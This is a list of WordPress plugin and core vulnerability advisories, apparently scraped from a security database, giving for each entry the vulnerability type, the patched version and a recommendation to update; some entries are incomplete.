Patched Version: 2.9.42.1
Recommended Action: Update to version 2.9.42.1, or a newer patched version

Plugin: Most And Least Read Posts Widget

Vulnerability: Authenticated(Contributor+) SQL Injection via Widget settings
Patched Version: 2.5.17
Recommended Action: Update to version 2.5.17, or a newer patched version

Plugin: Zoho SalesIQ – Live chat, chatbots, and visitor tracking

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.0.9
Recommended Action: Update to version 1.0.9, or a newer patched version

Plugin: 10Web Map Builder for Google Maps

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 1.0.70
Recommended Action: Update to version 1.0.70, or a newer patched version

Plugin: WP Activity Log

Vulnerability: SQL Injection
Patched Version: 4.1.5
Recommended Action: Update to version 4.1.5, or a newer patched version

Plugin: Picture Gallery – Frontend Image Uploads, AJAX Photo List

Vulnerability: Cross-Site Scripting
Patched Version: 1.4.3
Recommended Action: Update to version 1.4.3, or a newer patched version

Plugin: Fancy Product Designer

Vulnerability: Insufficient Authorization to Arbitrary Options Update via fpd_update_options
Patched Version: 4.7.0
Recommended Action: Update to version 4.7.0, or a newer patched version

Plugin: LeagueManager

Vulnerability: SQL Injection
Patched Version: 3.8.1
Recommended Action: Update to version 3.8.1, or a newer patched version

Plugin: Easy Table

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 1.7
Recommended Action: Update to version 1.7, or a newer patched version

Plugin: LearnPress – WordPress LMS Plugin

Vulnerability: Missing Authorization to Information Exposure
Patched Version: 4.2.3.1
Recommended Action: Update to version 4.2.3.1, or a newer patched version

Plugin: Fast Velocity Minify

Vulnerability: Full Path Disclosure
Patched Version: 2.7.7
Recommended Action: Update to version 2.7.7, or a newer patched version

Plugin: Relevant – Related, Featured, Latest, and Popular Posts by BestWebSoft

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.2.0
Recommended Action: Update to version 1.2.0, or a newer patched version

Plugin: WP Visited Countries Reloaded

Vulnerability: Cross-Site Scripting
Patched Version: 3.1.1
Recommended Action: Update to version 3.1.1, or a newer patched version

Core: WordPress

Vulnerability: Server-Side Request Forgery
Patched Version: 4.5
Recommended Action: Update to version 4.5, or a newer patched version

Plugin: Translate WordPress – Google Language Translator

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 5.0.0
Recommended Action: Update to version 5.0.0, or a newer patched version

Plugin: Business Directory Plugin – Easy Listing Directories for WordPress

Vulnerability: Missing Authorization via dispatch
Patched Version: 6.3.10
Recommended Action: Update to version 6.3.10, or a newer patched version

Plugin: File Manager Advanced Shortcode WordPress

Vulnerability: Unauthenticated Arbitrary File Upload to Remote Code Execution via Shortcode
Patched Version: 2.4
Recommended Action: Update to version 2.4, or a newer patched version

Plugin: WordPress Simple Shopping Cart

Vulnerability: Information Disclosure
Patched Version: 4.6.4
Recommended Action: Update to version 4.6.4, or a newer patched version

Plugin: BitPay Checkout for WooCommerce

Vulnerability: Missing Authorization
Patched Version: 5.0.0
Recommended Action: Update to version 5.0.0, or a newer patched version

Plugin: Visitor Traffic Real Time Statistics

Vulnerability: Cross-Site Request Forgery to Arbitrary Plugin Installation/Activation
Patched Version: 3.1
Recommended Action: Update to version 3.1, or a newer patched version

Plugin: PNG to JPG

Vulnerability: Cross-Site Request Forgery leading to Stored Cross-Site Scripting
Patched Version: 4.1
Recommended Action: Update to version 4.1, or a newer patched version

Plugin: AF Companion – Build Stylish WordPress Websites in Minutes – No Coding, Just Click and Go! Starter Sites Importer for WordPress

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.2.0
Recommended Action: Update to version 1.2.0, or a newer patched version

Plugin: Enable Media Replace

Vulnerability: Authenticated (Administrator+) Path Traversal
Patched Version: 4.0.0
Recommended Action: Update to version 4.0.0, or a newer patched version

Plugin: Store Locator Plus® for WordPress

Vulnerability: Email Injection
Patched Version: 4.2.27
Recommended Action: Update to version 4.2.27, or a newer patched version

Plugin: Japanized For WooCommerce

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.5.7
Recommended Action: Update to version 2.5.7, or a newer patched version

Plugin: E2Pdf – Export Pdf Tool for WordPress

Vulnerability: Authenticated (Administrator+) PHP Object Injection
Patched Version: 1.20.19
Recommended Action: Update to version 1.20.19, or a newer patched version

Plugin: Property Hive

Vulnerability: Reflected Cross-Site Scripting via date_post_id
Patched Version: 1.5.49
Recommended Action: Update to version 1.5.49, or a newer patched version

Plugin: Galleria

Vulnerability: Cross-Site Request Forgery via showOptionsPage
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Easy Digital Downloads – eCommerce Payments and Subscriptions made easy

Vulnerability: Cross-Site Request Forgery to Arbitrary Post Deletion
Patched Version: 3.0
Recommended Action: Update to version 3.0, or a newer patched version

Plugin: Quiz and Survey Master (QSM) – Easy Quiz and Survey Maker

Vulnerability: Sensitive Information Disclosure
Patched Version: 7.3.11
Recommended Action: Update to version 7.3.11, or a newer patched version

Plugin: Meks Smart Social Widget

Vulnerability: Missing Authorization to notice dimissal
Patched Version: 1.6.1
Recommended Action: Update to version 1.6.1, or a newer patched version

Plugin: Visualizer: Tables and Charts Manager for WordPress

Vulnerability: Stored Cross-Site Scripting
Patched Version: 3.3.1
Recommended Action: Update to version 3.3.1, or a newer patched version

Plugin: WP Social AutoConnect

Vulnerability: Cross-Site Request Forgery via jfb_admin_page
Patched Version: 4.6.2
Recommended Action: Update to version 4.6.2, or a newer patched version

Plugin: AffiliateWP

Vulnerability: Missing Authorization to Authenticated (Subscriber+) Arbitrary Plugin Activation
Patched Version: 2.14.1
Recommended Action: Update to version 2.14.1, or a newer patched version

Plugin: Exchange Addon Membership

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.3.0
Recommended Action: Update to version 1.3.0, or a newer patched version

Plugin: Import any XML, CSV or Excel File to WordPress

Vulnerability: Authenticated (Administrator+) Arbitrary File Upload
Patched Version: 3.6.9
Recommended Action: Update to version 3.6.9, or a newer patched version

Plugin: BulletProof Security

Vulnerability: Cross-Site Scripting
Patched Version: .53.3
Recommended Action: Update to version .53.3, or a newer patched version

Plugin: WP Opt-in

Plugin: Site Reviews

Vulnerability: Unauthenticated CSV Injection
Patched Version: 6.4.0
Recommended Action: Update to version 6.4.0, or a newer patched version

Plugin: Custom Searchable Data Entry System

Core: WordPress

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 3.7.31
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.31, 3.8.31, 3.9.29, 4.0.28, 4.1.28, 4.2.25, 4.3.21, 4.4.20, 4.5.19, 4.6.16, 4.7.15, 4.8.11, 4.9.12, 5.0.7, 5.1.3, 5.2.4

Plugin: Tabs & Accordion

Plugin: Protección de Datos RGPD

Plugin: Ninja Forms – The Contact Form Builder That Grows With You

Vulnerability: Cross-Site Scripting via field label
Patched Version: 3.6.10
Recommended Action: Update to version 3.6.10, or a newer patched version

Plugin: File Manager

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 7.1
Recommended Action: Update to version 7.1, or a newer patched version

Plugin: WPML

Vulnerability: Unprotected AJAX Actions
Patched Version: 4.5.11
Recommended Action: Update to version 4.5.11, or a newer patched version

Plugin: Custom User Profile Fields for User Registration & Member Frontend Profiles with Paid Memberships Pro

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.8.1
Recommended Action: Update to version 1.8.1, or a newer patched version

Plugin: Events Made Easy

Vulnerability: Subscriber+ SQL Injection
Patched Version: 2.2.36
Recommended Action: Update to version 2.2.36, or a newer patched version

Plugin: Work The Flow File Upload

Vulnerability: Arbitrary File Upload
Patched Version: 2.5.3
Recommended Action: Update to version 2.5.3, or a newer patched version

Plugin: Pre-Orders for WooCommerce

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 1.2.14
Recommended Action: Update to version 1.2.14, or a newer patched version

Plugin: Job Board Vanila Plugin

Plugin: BP Group Documents

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.2.2
Recommended Action: Update to version 1.2.2, or a newer patched version

Plugin: Podcast Channels

Vulnerability: Cross-Site Scripting
Patched Version: 0.21
Recommended Action: Update to version 0.21, or a newer patched version

Plugin: Copy or Move Comments

Vulnerability: Cross-Site Scripting and SQL Injection
Patched Version: 1.0.1
Recommended Action: Update to version 1.0.1, or a newer patched version

Plugin: W3 Total Cache

Vulnerability: Arbitrary Code Execution via settings import
Patched Version: 0.9.5
Recommended Action: Update to version 0.9.5, or a newer patched version

Plugin: April’s Super Functions Pack

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.4.8
Recommended Action: Update to version 1.4.8, or a newer patched version

Plugin: Dbox 3D Slider Lite

Vulnerability: SQL Injection
Patched Version: 1.2.3
Recommended Action: Update to version 1.2.3, or a newer patched version

Plugin: Support Board

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.3.6
Recommended Action: Update to version 3.3.6, or a newer patched version

Plugin: Ocean Extra

Vulnerability: Cross-Site Request Forgery Bypass
Patched Version: 1.6.6
Recommended Action: Update to version 1.6.6, or a newer patched version

Plugin: Magic Fields

Vulnerability: Cross-Site Scripting via RCCWP_CreateCustomFieldPage.php custom-group-id parameter
Patched Version: 1.7.2
Recommended Action: Update to version 1.7.2, or a newer patched version

Plugin: My Chatbot

Plugin: GeoDirectory – WP Business Directory Plugin and Classified Listings Directory

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 2.2.22
Recommended Action: Update to version 2.2.22, or a newer patched version

Plugin: WP Statistics – The Most Popular Privacy-Friendly Analytics Plugin

Vulnerability: Authenticated Cross-Site Scripting
Patched Version: 12.0.10
Recommended Action: Update to version 12.0.10, or a newer patched version

Plugin: Ultimate FAQ Accordion Plugin

Vulnerability: Unauthenticated Options Import/Export
Patched Version: 1.8.25
Recommended Action: Update to version 1.8.25, or a newer patched version

Core: WordPress

Vulnerability: Password Change via Stolen Cookie
Patched Version: 3.7.15
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.15, 3.8.15, 3.9.13, 4.0.12, 4.1.12, 4.2.9, 4.3.5, 4.4.4, 4.5.3

Plugin: FV Flowplayer Video Player

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 7.2.1.727
Recommended Action: Update to version 7.2.1.727, or a newer patched version

Plugin: Relocate Upload

Vulnerability: Remote File Inclusion
Patched Version: 0.20
Recommended Action: Update to version 0.20, or a newer patched version

Plugin: WP Video Lightbox

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.9.7
Recommended Action: Update to version 1.9.7, or a newer patched version

Plugin: WordPress Ultra Simple Paypal Shopping Cart

Vulnerability: Cross-Site Request Forgery
Patched Version: 4.5
Recommended Action: Update to version 4.5, or a newer patched version

Plugin: WordPress Mobile Pack – Mobile Plugin for Progressive Web Apps & Hybrid Mobile Apps

Vulnerability: Information Disclosure
Patched Version: 2.0.2
Recommended Action: Update to version 2.0.2, or a newer patched version

Plugin: PixCodes

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 2.3.7
Recommended Action: Update to version 2.3.7, or a newer patched version

Plugin: RapidLoad – Optimize Web Vitals Automatically

Vulnerability: Authenticated (Subscriber+) SQL Injection
Patched Version: 1.6.36
Recommended Action: Update to version 1.6.36, or a newer patched version

Plugin: Remove tabs and fields from WooCommerce

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.69
Recommended Action: Update to version 1.69, or a newer patched version

Plugin: WooCommerce

Vulnerability: Cross-Site Request Forgery
Patched Version: 8.3.0
Recommended Action: Update to version 8.3.0, or a newer patched version

Plugin: Better Messages – Live Chat for WordPress, BuddyPress, PeepSo, Ultimate Member, BuddyBoss

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.9.9.41
Recommended Action: Update to version 1.9.9.41, or a newer patched version

Plugin: Custom post types, Custom Fields & more

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 5.0.0
Recommended Action: Update to version 5.0.0, or a newer patched version

Plugin: Really Simple Facebook Twitter Share Buttons

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.10.5
Recommended Action: Update to version 2.10.5, or a newer patched version

Plugin: Podlove Subscribe button

Vulnerability: Cross-Site Request Forgery via save function
Patched Version: 1.3.9
Recommended Action: Update to version 1.3.9, or a newer patched version

Plugin: Auto Publish for Google My Business

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 3.4
Recommended Action: Update to version 3.4, or a newer patched version

Plugin: RapidLoad – Optimize Web Vitals Automatically

Vulnerability: Missing Authorization in ‘ucss_connect’
Patched Version: 1.7.2
Recommended Action: Update to version 1.7.2, or a newer patched version

Plugin: Awesome Support – WordPress HelpDesk & Support Plugin

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 6.0.7
Recommended Action: Update to version 6.0.7, or a newer patched version

Plugin: Custom 404 Pro

Vulnerability: Unauthenticated SQL Injection via ‘s’
Patched Version: 3.8.1
Recommended Action: Update to version 3.8.1, or a newer patched version

Plugin: JobCareer | Job Board Responsive WordPress Theme

Vulnerability: Stored Cross-Site Scripting
Patched Version: 2.5.1
Recommended Action: Update to version 2.5.1, or a newer patched version

Plugin: Spam protection, Anti-Spam, FireWall by CleanTalk

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 5.174.1
Recommended Action: Update to version 5.174.1, or a newer patched version

Plugin: DiveBook

Plugin: Patreon WordPress

Vulnerability: PHP Object Injection
Patched Version: 1.2.2
Recommended Action: Update to version 1.2.2, or a newer patched version

Plugin: BadgeOS

Vulnerability: Authenticated (Subscriber+) Insecure Direct Object Reference to Arbitrary Post Deletion
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: AnyComment

Vulnerability: Cross-Site Scripting
Patched Version: 0.0.33
Recommended Action: Update to version 0.0.33, or a newer patched version

Plugin: Homepage SlideShow

Plugin: Interactive Contact Form and Multi Step Form Builder with Drag & Drop Editor – Funnelforms Free

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 3.4
Recommended Action: Update to version 3.4, or a newer patched version

Plugin: Recipe Cards For Your Food Blog from Zip Recipes

Vulnerability: Cross-Site Request Forgery
Patched Version: 8.0.8
Recommended Action: Update to version 8.0.8, or a newer patched version

Plugin: DandyID Services

Plugin: HTML5 Video Player with Playlist

Plugin: Starter Templates — Elementor, WordPress & Beaver Builder Templates

Vulnerability: Incorrect Authorization
Patched Version: 3.2.6
Recommended Action: Update to version 3.2.6, or a newer patched version

Plugin: Rencontre – Dating Site

Vulnerability: SQL Injection
Patched Version: 3.1.3
Recommended Action: Update to version 3.1.3, or a newer patched version

Plugin: VikBooking Hotel Booking Engine & PMS

Vulnerability: Admin+ Stored Cross-Site Scripting
Patched Version: 1.5.8
Recommended Action: Update to version 1.5.8, or a newer patched version

Plugin: Superb Social Media Share Buttons and Follow Buttons for WordPress

Vulnerability: Cross-Site Request Forgery via spbsmAjax
Patched Version: 1.1.5
Recommended Action: Update to version 1.1.5, or a newer patched version

Plugin: PDF Builder for WooCommerce. Create invoices,packing slips and more

Vulnerability: Cross-Site Request Forgery via Save
Patched Version: 1.2.91
Recommended Action: Update to version 1.2.91, or a newer patched version

Plugin: wpForo Forum

Vulnerability: Open Redirect
Patched Version: 1.9.7
Recommended Action: Update to version 1.9.7, or a newer patched version

Plugin: Tab – Accordion, FAQ

Vulnerability: Unauthenticated Arbitrary Tab Modification
Patched Version: 1.3.2
Recommended Action: Update to version 1.3.2, or a newer patched version

Plugin: WP Customer Area

Vulnerability: Cross-Site Scripting
Patched Version: 7.4.3
Recommended Action: Update to version 7.4.3, or a newer patched version

Plugin: Directorist: AI-Powered WordPress Business Directory Plugin with Classified Ads Listings

Vulnerability: Missing Authorization
Patched Version: 7.3.0
Recommended Action: Update to version 7.3.0, or a newer patched version

Plugin: RSVPmaker Excel

Plugin: Popup Builder – Create highly converting, mobile friendly marketing popups.

Vulnerability: No subtitle
Patched Version: 3.72
Recommended Action: Update to version 3.72, or a newer patched version

Plugin: WhyDonate – FREE Donate button – Crowdfunding – Fundraising

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.12.16
Recommended Action: Update to version 3.12.16, or a newer patched version

Plugin: Absolute Reviews

Vulnerability: Cross-Site Request Forgery Bypass
Patched Version: 1.0.9
Recommended Action: Update to version 1.0.9, or a newer patched version

Plugin: Simple Posts Ticker – Easy, Lightweight & Flexible

Vulnerability: Authenticated(Contributor+) Stored Cross-Site Scripting via shortcode
Patched Version: 1.1.6
Recommended Action: Update to version 1.1.6, or a newer patched version

Plugin: WP Recipe Maker

Vulnerability: Authenticated(Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 9.1.1
Recommended Action: Update to version 9.1.1, or a newer patched version

Plugin: WordPress RokBox

Vulnerability: Abuse of Functionality
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Side Cart Woocommerce | Woocommerce Cart

Vulnerability: Cross-Site Request Forgery to Arbitrary Options Update
Patched Version: 2.1
Recommended Action: Update to version 2.1, or a newer patched version

Plugin: OptionTree

Vulnerability: PHP Object Injection
Patched Version: 2.7.0
Recommended Action: Update to version 2.7.0, or a newer patched version

Plugin: qTranslate

Plugin: Welcart e-Commerce

Vulnerability: Multiple Cross-Site Scripting
Patched Version: 1.4.18
Recommended Action: Update to version 1.4.18, or a newer patched version

Plugin: NotificationX – Live Sales Notification, WooCommerce Sales Popup, FOMO, Social Proof, Announcement Banner & Floating Notification Top Bar

Vulnerability: Blind SQL Injection
Patched Version: 2.3.9
Recommended Action: Update to version 2.3.9, or a newer patched version

Plugin: Social proof testimonials and reviews by Repuso

Vulnerability: Missing Authorization
Patched Version: 5.00
Recommended Action: Update to version 5.00, or a newer patched version

Plugin: Astra Pro Addon

Vulnerability: Unauthenticated SQL Injection
Patched Version: 3.5.2
Recommended Action: Update to version 3.5.2, or a newer patched version

Plugin: Migration, Backup, Staging – WPvivid Backup & Migration

Vulnerability: Reflected Cross-Site Scripting via sub_page Parameter
Patched Version: 0.9.70
Recommended Action: Update to version 0.9.70, or a newer patched version

Plugin: Registration Forms – User Registration Forms, Invitation-Based Registrations, Front-end User Profile, Login Form & Content Restriction

Vulnerability: Unauthenticated SQL Injection
Patched Version: 3.7.1.6
Recommended Action: Update to version 3.7.1.6, or a newer patched version

Plugin: Wallet for WooCommerce

Vulnerability: Insecure Direct Object Reference
Patched Version: 1.4.4
Recommended Action: Update to version 1.4.4, or a newer patched version

Plugin: WooCommerce Multiple Customer Addresses & Shipping

Vulnerability: Missing Authorization leading to Authenticated (Subscriber+) Arbitrary Address Creation/Deletion/View/Updates
Patched Version: 21.7
Recommended Action: Update to version 21.7, or a newer patched version

Plugin: WP REST API (WP API)

Vulnerability: Potential Cross-Site Request Forgery Bypass
Patched Version: 1.1.1
Recommended Action: Update to version 1.1.1, or a newer patched version

Plugin: Bitcoin Satoshi Tools : Faucets, Visitor Rewarder, Satoshi Games, Referral Program

Plugin: Wp-D3

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.4.1
Recommended Action: Update to version 2.4.1, or a newer patched version

Plugin: WangGuard

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.7.3
Recommended Action: Update to version 1.7.3, or a newer patched version

Plugin: Custom Global Variables

Vulnerability: Stored Cross-Site Scripting via ‘name’
Patched Version: 1.1.1
Recommended Action: Update to version 1.1.1, or a newer patched version

Plugin: E Unlocked – Student Result

Vulnerability: Student Result <= 1.0.4
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Tutor LMS – eLearning and online course solution

Vulnerability: SQL Injection via tutor_answering_quiz_question/get_answer_by_id
Patched Version: 1.8.3
Recommended Action: Update to version 1.8.3, or a newer patched version

Plugin: wp tell a friend popup form

Plugin: Disqus Comment System

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.68
Recommended Action: Update to version 2.68, or a newer patched version

Plugin: WP Mailto Links – Protect Email Addresses

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 3.1.4
Recommended Action: Update to version 3.1.4, or a newer patched version

Core: WordPress

Vulnerability: HTTP Response Splitting
Patched Version: 1.2.1
Recommended Action: Update to version 1.2.1, or a newer patched version

Plugin: Nested Pages

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 3.2.7
Recommended Action: Update to version 3.2.7, or a newer patched version

Plugin: MailerLite – Signup forms (official)

Vulnerability: Unauthenticated SQL Injection
Patched Version: 1.4.4
Recommended Action: Update to version 1.4.4, or a newer patched version

Plugin: Essential Blocks – Page Builder Gutenberg Blocks, Patterns & Templates

Vulnerability: Incorrect Authorization Checks
Patched Version: 4.2.1
Recommended Action: Update to version 4.2.1, or a newer patched version

Plugin: Contact Form DB

Vulnerability: Authenticated Cross-Site Scripting
Patched Version: 2.8.28
Recommended Action: Update to version 2.8.28, or a newer patched version

Plugin: WP VR – 360 Panorama and Free Virtual Tour Builder For WordPress

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 8.2.7
Recommended Action: Update to version 8.2.7, or a newer patched version

Plugin: Affiliates Manager

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.9.14
Recommended Action: Update to version 2.9.14, or a newer patched version

Plugin: Nested Pages

Vulnerability: Cross-Site Request Forgery to Arbitrary Post Deletion and Modification
Patched Version: 3.1.16
Recommended Action: Update to version 3.1.16, or a newer patched version

Plugin: Media Library Assistant

Vulnerability: Authenticated (Administrator+) SQL Injection
Patched Version: 3.06
Recommended Action: Update to version 3.06, or a newer patched version

Plugin: Import XML and RSS Feeds

Vulnerability: Server-Side Request Forgery
Patched Version: 2.0.3
Recommended Action: Update to version 2.0.3, or a newer patched version

Plugin: Floating Social Media Links

Vulnerability: Remote File Inclusion via fsml-admin.js.php wpp parameter
Patched Version: 1.4.3
Recommended Action: Update to version 1.4.3, or a newer patched version

Plugin: Thank You Page Customizer for WooCommerce – Increase Your Sales

Vulnerability: Cross-Site Request Forgery via send_email
Patched Version: 1.0.14
Recommended Action: Update to version 1.0.14, or a newer patched version

Plugin: Stream

Vulnerability: Sensitive Data Exposure
Patched Version: 3.0.6
Recommended Action: Update to version 3.0.6, or a newer patched version

Core: WordPress

Vulnerability: No subtitle
Patched Version: 3.7.28
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.28, 3.8.28, 3.9.26, 4.0.25, 4.1.25, 4.2.22, 4.3.18, 4.4.17, 4.5.16, 4.6.13, 4.7.12, 4.8.8, 4.9.9, 5.0.1

Plugin: Minimal Coming Soon – Coming Soon Page

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 2.35
Recommended Action: Update to version 2.35, or a newer patched version

Plugin: MyCSS

Plugin: Ultimate Addons for WPBakery

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.19.18
Recommended Action: Update to version 3.19.18, or a newer patched version

Plugin: Quiz and Survey Master (QSM) – Easy Quiz and Survey Maker

Vulnerability: Cross-Site Request Forgery to Stored Cross-Site Scripting
Patched Version: 4.7.9
Recommended Action: Update to version 4.7.9, or a newer patched version

Plugin: WP Page Builder

Plugin: Login by Auth0

Vulnerability: Cross-Site Request Forgery
Patched Version: 4.0.0
Recommended Action: Update to version 4.0.0, or a newer patched version

Plugin: BulletProof Security

Vulnerability: Server-Side Request Forgery
Patched Version: .51.1
Recommended Action: Update to version .51.1, or a newer patched version

Plugin: Google Site Verification plugin using Meta Tag

Plugin: WP eCommerce

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.9.3
Recommended Action: Update to version 3.9.3, or a newer patched version

Plugin: Product page shipping calculator for WooCommerce

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.3.21
Recommended Action: Update to version 1.3.21, or a newer patched version

Plugin: Google Authenticator – WordPress 2FA, OTP SMS and Email

Vulnerability: Cross-Site Request Forgery to Malware Scan Termination
Patched Version: 5.6.2
Recommended Action: Update to version 5.6.2, or a newer patched version

Plugin: Plugin for Google Reviews

Vulnerability: Missing Authorization
Patched Version: 2.2.3
Recommended Action: Update to version 2.2.3, or a newer patched version

Plugin: WP Quick FrontEnd Editor – WordPress Plugin

Plugin: Codestyling Localization

Plugin: Ultimate Member – User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin

Vulnerability: Authenticated (Admin+) Remote Code Execution via Multi-Select
Patched Version: 2.5.1
Recommended Action: Update to version 2.5.1, or a newer patched version

Plugin: Social Slider Feed

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.8.5
Recommended Action: Update to version 1.8.5, or a newer patched version

Plugin: Download Manager

Vulnerability: Arbitrary File Upload
Patched Version: 3.1.19
Recommended Action: Update to version 3.1.19, or a newer patched version

Plugin: eCommerce Product Catalog Plugin for WordPress

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.0.72
Recommended Action: Update to version 3.0.72, or a newer patched version

Plugin: Contact Form by BestWebSoft – Advanced Contact Us Form Builder for WordPress

Vulnerability: Cross-Site Scripting
Patched Version: 4.0.2
Recommended Action: Update to version 4.0.2, or a newer patched version

Plugin: Jquery Validation For Contact Form 7

Vulnerability: Cross-Site Request Forgery to Arbitrary Options Update
Patched Version: 5.3
Recommended Action: Update to version 5.3, or a newer patched version

Plugin: Seamless Donations is Sunset

Vulnerability: Cross-Site Request Forgery to Settings Chage
Patched Version: 5.1.8
Recommended Action: Update to version 5.1.8, or a newer patched version

Plugin: Tutor LMS – eLearning and online course solution

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.0.10
Recommended Action: Update to version 2.0.10, or a newer patched version

Plugin: WP EXtra

Vulnerability: Missing Authorization to Export Settings
Patched Version: 6.3
Recommended Action: Update to version 6.3, or a newer patched version

Plugin: BuddyPress

Vulnerability: Denial of Service
Patched Version: 5.1.1
Recommended Action: Update to version 5.1.1, or a newer patched version

Plugin: Gwolle Guestbook

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.1.1
Recommended Action: Update to version 2.1.1, or a newer patched version

Plugin: Order Tracking – WordPress Status Tracking Plugin

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.3.7
Recommended Action: Update to version 3.3.7, or a newer patched version

Plugin: Download Manager

Vulnerability: Authenticated SQL Injection
Patched Version: 3.2.34
Recommended Action: Update to version 3.2.34, or a newer patched version

Plugin: UserPro – Community and User Profile WordPress Plugin

Vulnerability: Cross-Site Request Forgery via multiple functions
Patched Version: 5.1.2
Recommended Action: Update to version 5.1.2, or a newer patched version

Plugin: FormBuilder

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 0.91
Recommended Action: Update to version 0.91, or a newer patched version

Plugin: Pretty Link Lite

Vulnerability: Cross-Site Scripting
Patched Version: 1.5.6
Recommended Action: Update to version 1.5.6, or a newer patched version

Plugin: Slider & Popup Builder by Depicter – Add Image Slider, Carousel Slider, Exit Intent Popup, Popup Modal, Coupon Popup, Post Slider Carousel

Vulnerability: Missing Authorization on ‘make’ function
Patched Version: 1.9.1
Recommended Action: Update to version 1.9.1, or a newer patched version

Plugin: Feed Them Gallery

Vulnerability: Cross-Site Scripting
Patched Version: 1.1.9
Recommended Action: Update to version 1.1.9, or a newer patched version

Plugin: EventPrime – Events Calendar, Bookings and Tickets

Vulnerability: Reflected HTML Content Injection
Patched Version: 3.2.0
Recommended Action: Update to version 3.2.0, or a newer patched version

Plugin: Product Vendors

Vulnerability: Authenticated (Vendor admin+) SQL Injection
Patched Version: 2.1.77
Recommended Action: Update to version 2.1.77, or a newer patched version

Plugin: Simple Share Follow Button

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.04
Recommended Action: Update to version 1.04, or a newer patched version

Plugin: Doneren met Mollie

Vulnerability: Information Disclosure
Patched Version: 2.8.5
Recommended Action: Update to version 2.8.5, or a newer patched version

Plugin: AdRotate Banner Manager – The only ad manager you'll need

Vulnerability: Authenticated SQL Injection
Patched Version: 5.8.4
Recommended Action: Update to version 5.8.4, or a newer patched version

Plugin: Buy Me a Coffee – Button and Widget Plugin

Vulnerability: Authenticated (Subscriber+) Stored Cross-Site Scripting
Patched Version: 3.7
Recommended Action: Update to version 3.7, or a newer patched version

Plugin: WPUpper Share Buttons

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 3.43
Recommended Action: Update to version 3.43, or a newer patched version

Plugin: Popup Box – Create Countdown, Coupon, Video, Contact Form Popups

Vulnerability: Authenticated SQL Injection
Patched Version: 2.3.4
Recommended Action: Update to version 2.3.4, or a newer patched version

Plugin: Photo Gallery, Sliders, Proofing and Themes – NextGEN Gallery

Vulnerability: Authenticated (Admin+) PHAR Deserialization
Patched Version: 3.39
Recommended Action: Update to version 3.39, or a newer patched version

Plugin: WordPress CRM, Email & Marketing Automation for WordPress | Award Winner — Groundhogg

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting via Task Data
Patched Version: 2.7.11.11
Recommended Action: Update to version 2.7.11.11, or a newer patched version

Plugin: ARI Stream Quiz – WordPress Quizzes Builder

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 1.3.0
Recommended Action: Update to version 1.3.0, or a newer patched version

Core: WordPress

